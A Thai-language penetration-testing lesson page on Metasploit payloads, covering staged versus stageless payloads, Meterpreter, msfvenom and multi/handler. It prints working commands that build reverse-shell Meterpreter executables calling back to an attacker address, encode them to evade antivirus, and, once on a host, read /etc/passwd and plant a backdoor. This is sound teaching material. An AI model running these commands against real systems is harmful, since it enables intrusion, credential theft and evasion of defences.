เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
เลือกเพย์โหลดที่เหมาะสมกับสถานการณ์ และใช้ Meterpreter หลังการเจาะระบบ
เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
เพย์โหลดคืออะไร
เพย์โหลดคือโค้ดที่ทำงานบนเป้าหมายหลังการใช้ประโยชน์จากช่องโหว่สำเร็จ เพย์โหลดกำหนดสิ่งที่ผู้โจมตีจะได้รับ ได้แก่ เชลล์ การเรียกใช้คำสั่ง การเข้าถึงไฟล์ หรือเอเจนต์ที่มีความสามารถครบถ้วนอย่าง Meterpreter
เพย์โหลดแบบแบ่งขั้นกับแบบไร้ขั้น
เพย์โหลดแบบ ไร้ขั้น (/) มีทุกอย่างอยู่ในไบนารีเดียว — มีขนาดใหญ่กว่าแต่เรียบง่ายกว่า และไม่ต้องมีการเรียกกลับผ่านเครือข่ายหลังการส่งครั้งแรก เพย์โหลดแบบ แบ่งขั้น (//) จะส่งตัวเริ่มต้นขนาดเล็กก่อน จากนั้นจึงดาวน์โหลดขั้นที่สองจากตัวจัดการ
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsควรใช้แต่ละแบบเมื่อใด
ใช้เพย์โหลดแบบ ไร้ขั้น เมื่อเป้าหมายไม่สามารถเข้าถึงอินเทอร์เน็ตหรือตัวจัดการหลังการโจมตีครั้งแรกได้ — เพย์โหลดต้องมีทุกอย่างในตัว ใช้เพย์โหลดแบบ แบ่งขั้น เมื่อต้องการเพย์โหลดเริ่มต้นที่มีขนาดเล็กกว่าและมีการเชื่อมต่อไปยังตัวจัดการที่เชื่อถือได้
ภาพรวมของ Meterpreter
Meterpreter คือเพย์โหลดขั้นสูงของ Metasploit ซึ่งทำงานทั้งหมดในหน่วยความจำ สื่อสารแบบเข้ารหัส และมี API ที่ครบความสามารถ ได้แก่ การเข้าถึงระบบไฟล์ การย้ายกระบวนการ การบันทึกการกดแป้นพิมพ์ การจับภาพหน้าจอ และการใช้เครื่องที่ถูกเจาะเป็นทางผ่าน
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runคำสั่งของ Meterpreter
คำสั่ง Meterpreter ที่จำเป็นสำหรับการทำงานหลังการใช้ประโยชน์จากช่องโหว่ ได้แก่ ข้อมูลระบบ รายการกระบวนการ การดำเนินการกับไฟล์ และเครือข่าย
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellการย้ายกระบวนการ
ย้ายกระบวนการ Meterpreter ไปยังกระบวนการที่เสถียรกว่าหรือดูน่าสงสัยน้อยกว่า (เช่น explorer.exe บน Windows) การทำเช่นนี้อาจช่วยยกระดับสิทธิ์ได้ด้วย หากย้ายไปยังกระบวนการที่มีสิทธิ์สูงกว่า
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsการสร้างเพย์โหลดด้วย msfvenom
msfvenom สร้างไฟล์เพย์โหลดแบบทำงานได้ในตัว (EXE, ELF, APK, เชลล์โค้ด) เพื่อส่งผ่านฟิชชิง การทิ้ง USB หรือเว็บเชลล์ในการทดสอบที่ได้รับอนุญาต
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler สำหรับรับเชลล์
โมดูลเสริม multi/handler จะรับการเชื่อมต่อเชลล์ย้อนกลับ กำหนดค่าให้ใช้เพย์โหลด LHOST และ LPORT เดียวกับที่ใช้ใน msfvenom ก่อนส่งเพย์โหลด
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobพื้นฐานการเข้ารหัสและการหลบเลี่ยง
ตัวเข้ารหัสของ msfvenom สามารถทำให้เพย์โหลดคลุมเครือเพื่อหลบเลี่ยงการตรวจจับของ AV ที่อาศัยลายเซ็นพื้นฐาน หมายเหตุ: EDR สมัยใหม่ใช้การตรวจจับตามพฤติกรรม ดังนั้นการใช้ตัวเข้ารหัสเพียงอย่างเดียวจึงไม่เพียงพอต่อการป้องกันขั้นสูง
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeเพย์โหลดแบบเชื่อมย้อนกลับกับแบบรอรับการเชื่อมต่อ
เพย์โหลดแบบเชื่อมย้อนกลับจะเชื่อมต่อจากเป้าหมายไปยังผู้โจมตี (เหมาะกว่าสำหรับ NAT/ไฟร์วอลล์) ส่วนเพย์โหลดแบบรอรับการเชื่อมต่อจะรับฟังอยู่บนเป้าหมาย — ผู้โจมตีเป็นฝ่ายเชื่อมต่อเข้าไป โดยทั่วไปมักเลือกใช้แบบเชื่อมย้อนกลับ
การตรวจจับเพย์โหลดโดยผู้ป้องกันระบบ
ผู้ป้องกันระบบตรวจจับ Meterpreter ได้จากลายเซ็นเครือข่าย (รูปแบบการรับส่งข้อมูล C2) การสแกนหน่วยความจำ (ร่องรอยการแทรก DLL แบบสะท้อนกลับ) และการวิเคราะห์พฤติกรรม (การทำให้กระบวนการกลวง ความสัมพันธ์ระหว่างกระบวนการแม่กับกระบวนการลูกที่ผิดปกติ)
ตรวจสอบอย่างรวดเร็ว
อะไรคือความแตกต่างระหว่างเพย์โหลดแบบแบ่งขั้นกับเพย์โหลดแบบไร้ขั้นใน Metasploit
สรุป: เพย์โหลดและ Meterpreter
เลือกเพย์โหลดแบบแบ่งขั้นเมื่อต้องการลดขนาดเริ่มต้น และเลือกแบบไร้ขั้นเมื่อต้องการการส่งที่มีทุกอย่างในตัว Meterpreter คือเพย์โหลดที่มีความสามารถสูงสุดสำหรับการทำงานหลังการใช้ประโยชน์จากช่องโหว่ โดยทำงานในหน่วยความจำ เข้ารหัส และขยายความสามารถได้ ใช้ msfvenom เพื่อสร้างไบนารีแบบทำงานได้ในตัว และกำหนดค่า multi/handler เพื่อรับการเรียกกลับเสมอ
เรียนรู้ Cyber Security Academy ด้วย AI tutor — ฟรี
เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป
- คอร์ส
- 76
- บทเรียน
- 303
คำถามที่พบบ่อย
บทเรียน “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter”
เลือกเพย์โหลดที่เหมาะสมกับสถานการณ์ และใช้ Meterpreter หลังการเจาะระบบ คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน
บทเรียน “เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม
ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- สถาปัตยกรรม Metasploit และ msfconsole
- การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
- เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
- หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่